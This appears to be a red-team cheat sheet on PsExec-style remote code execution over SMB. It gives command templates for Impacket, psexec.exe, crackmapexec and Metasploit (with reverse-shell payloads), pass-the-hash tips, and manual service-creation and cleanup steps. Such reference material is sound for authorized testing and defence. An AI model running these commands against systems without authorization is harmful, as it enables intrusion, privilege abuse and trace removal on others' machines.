PsExec (tcp/445)

PsExec is an old trick introduced by Mark Russinovich that allows to perform remote code execution over SMB (tcp/445).


This trick requires to establish an SMB session with the target and is performed through the following steps:

Once the payload has been executed, the following steps are performed to clean:

Because it needs to interact with the Service Control Manager, it requires administrative privileges.

Note

The interaction with the Service Control Manager is possible via RPC called performed over the SMB session. Thus, no access to other RPC ports is required.


Impacket - psexec.py

psexec.py [DOMAIN/]<USERNAME>[:PASSWORD]@<HOST> [command]

Source: github.com/SecureAuthCorp/impacket/examples/psexec.py

Tip

Use -hashes LMHASH:NTHASH instead of specifying a password to authenticate using the pass-the-hash technique.

Info

This tool will execute commands as NT AUTHORITY\system instead of the user specified for authentication.

SysInternals - psexec.exe

psexec.exe -nobanner -accepteula \\<HOST> -u [DOMAIN\]<USERNAME> -r [SERVICE NAME] [command]

Source: docs.microsoft.com/en-us/sysinternals/downloads/psexec

Option Description
-d Runs the command detached, i.e. in the background, without any interaction with stdin and stdout
-s Runs the command with local SYSTEM privileges

Tip

Instead of specifying the username and password from the psexec.exe command line, you can also establish an SMB session with the target or start a new command prompt with NETONLY credentials.

crackmapexec

crackmapexec <HOST/CIDR> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --exec-method smbexec -x <CMD>

Source: github.com/byt3bl33d3r/CrackMapExec

Tip

Use -H [NTHASH] instead of -p [PASSWORD] to authenticate using the pass-the-hash technique.

Note

Use a capital -X to execute a PowerShell command instead.

Metasploit - exploit/windows/smb/psexec

use exploit/windows/smb/psexec
set RHOST <IP ADDRESS>
set SMBUser <USERNAME>
set SMBDomain <DOMAIN>
set SMBPass <PASSWORD>
set payload <meterpreter/reverse shell/cmd>
run -j

Source: github.com/rapid7/metasploit-framework/modules/exploits/windows/smb/psexec.rb

Tip

The SMBPass parameter also supports using a hash instead of a password.

Info

This module will execute commands as NT AUTHORITY\system instead of the user specified for authentication.

Warning

This module will not display the output of the executed payload.

Manual

First, establish an SMB session with the target or start a new command prompt with NETONLY credentials:

net use \\<HOST> /user:[DOMAIN\]<USERNAME>
runas /netonly /user:[DOMAIN\]<USERNAME> cmd.exe

Then, copy the executable file to the target through the SMB session:

copy \path\to\executable \\<HOST>\ADMIN$

Note

The ADMIN$ share usually maps to C:\Windows. Even though this is the usual folder to perform psexec, you can drop the executable wherever you want.

Then, create and start the service that will call the executable:

sc.exe \\<HOST> create <SERVICE NAME> binpath= "cmd.exe /k <\path\to\executable>"
sc.exe \\<HOST> start <SERVICE NAME>

Info

As the Service Control Manager expect a service-executable, it might tell that the service failed to launch if you provide it with a standard executable. This is because the executable failed to perform the proper API call to tell the service successfully started. In that case, the Service Control Manager will terminate the command after 30 seconds. That’s the reason why we need to call cmd.exe /k before the desired command. Using this trick, the cmd.exe process will be terminated but not its child process.

Finally, you can clean the service and executable once the payload has been executed:

sc.exe \\<HOST> delete <SERVICE NAME>
del \\<HOST>\path\to\executable

References